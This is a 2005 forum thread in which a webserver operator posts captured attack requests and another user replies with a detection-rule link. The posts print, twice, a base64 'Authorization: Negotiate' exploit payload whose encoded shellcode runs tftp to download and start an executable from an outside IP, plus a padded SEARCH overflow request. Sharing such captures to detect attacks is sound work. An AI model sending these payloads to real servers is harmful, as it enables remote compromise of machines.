|
Posted by on July 14, 2005, 5:24 am
If you were Registered and logged in, you could reply and use other advanced thread options
I've got some people who are trying to attack my
webserver, which is not Apache. But I would guess
they think it is, or perhaps they think it is
M$.
What they do is one of two things: either
they will send an HTTP request that is far too
short, or one that is far too long. An example
of the long kind:
GET / HTTP/1.0
Authorization: Negotiate
YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQMAI4I
MVwOCBAoAkEKQQpBCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+MuSYs0iwHuMcCZrITAdAf
Byg0Bwuv0O1QkBHXji18kAetmiwxLi18cAeuLHIsB64lcJATDMcBki0AwhcB4D4tADItwHK2LaAjpCwA
AAItANAV8AAAAi2g8XzH2YFbrDWjvzuBgaJj+ig5X/+fo7v///2NtZCAvYyB0ZnRwIC1pIDcwLjI2LjI
yOS4xMDQgR0VUIHdjbnNmdHkuZXhlJnN0YXJ0IHdjbnNmdHkuZXhlJmV4aXQAQkJCQkJCQkJCQkJCQkJ
.... and it goes on from there, beyond the maximum number of
bytes that is allowed. Of course, this has no effect, because
it's a well written server. But I suppose that if someone were
to decode that string, they might find some runnable code in
there.
Another long one follows. Notice it is neither GET nor POST.
SEARCH
/.^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B
±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^
B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±
^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B
±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^
B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±
^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B
±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^
B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±
^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B
±
....etc.
YF
|
|
Posted by Newsgroup Poster on July 14, 2005, 4:11 pm
If you were Registered and logged in, you could reply and use other advanced thread options
Hope this is of help:
http://translate.google.com/translate?hl=en&sl=ja&u=http://www.netpub.tsuzuki.yokohama.jp/detect/rule.html&prev=/search%3Fq%3D%2522YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUF%2522%26hl%3Den%26lr%3D%26safe%3Doff
2005/06/04 Attempt of cash server C -> S TCP 80 or 8080 ? " HTTP/1 " and "
Authorization:
Negotiate " and
" YIIQegYGKwYBBQUCoIIQbjC$$C$$EGqhghBmI4IQYgcOcbaeaqufbqufbquf "
http://216.239.59.104/search?q=cache:vqyN-OJEj-kJ:www.forbiddenweb.org/viewtopic.php%3Fid%3D33961+%22Authorization:+Negotiate%22&hl=en&start=10
I've got some people who are trying to attack my
webserver, which is not Apache. But I would guess
they think it is, or perhaps they think it is
M$.
What they do is one of two things: either
they will send an HTTP request that is far too
short, or one that is far too long. An example
of the long kind:
GET / HTTP/1.0
Authorization: Negotiate
YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4IQYgOCBAEAQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQMAI4I
MVwOCBAoAkEKQQpBCkEKBxFTy///86EYAAACLRTyLfAV4Ae+LTxiLXyAB6+MuSYs0iwHuMcCZrITAdAf
Byg0Bwuv0O1QkBHXji18kAetmiwxLi18cAeuLHIsB64lcJATDMcBki0AwhcB4D4tADItwHK2LaAjpCwA
AAItANAV8AAAAi2g8XzH2YFbrDWjvzuBgaJj+ig5X/+fo7v///2NtZCAvYyB0ZnRwIC1pIDcwLjI2LjI
yOS4xMDQgR0VUIHdjbnNmdHkuZXhlJnN0YXJ0IHdjbnNmdHkuZXhlJmV4aXQAQkJCQkJCQkJCQkJCQkJ
.... and it goes on from there, beyond the maximum number of
bytes that is allowed. Of course, this has no effect, because
it's a well written server. But I suppose that if someone were
to decode that string, they might find some runnable code in
there.
Another long one follows. Notice it is neither GET nor POST.
SEARCH
/.^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B
±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^
B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±
^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B
±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^
B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±
^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B
±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^
B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±
^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B±^B
±
....etc.
YF
|
| Similar Threads | Posted | | Possible attack on Redhat Enterprise 4.0 Webserver | November 28, 2007, 9:36 pm |
| OT: An attempt to learn from a malicious attack by an internet cracker. | March 26, 2006, 1:01 am |
| how can i tell if under attack? | October 16, 2005, 10:57 pm |
| Re: Possible attack? | September 19, 2008, 3:15 pm |
| Re: Possible attack? | September 19, 2008, 5:40 pm |
| Attack statistics... | August 11, 2004, 8:09 pm |
| What does denial of service attack mean? | April 30, 2005, 10:05 am |
| Network Attack generator | November 28, 2005, 9:49 am |
| DOS Attack & High load | June 29, 2007, 5:58 am |
| Re: MI5 messages are a DDOS attack? | November 18, 2007, 7:27 pm |
|
XML site map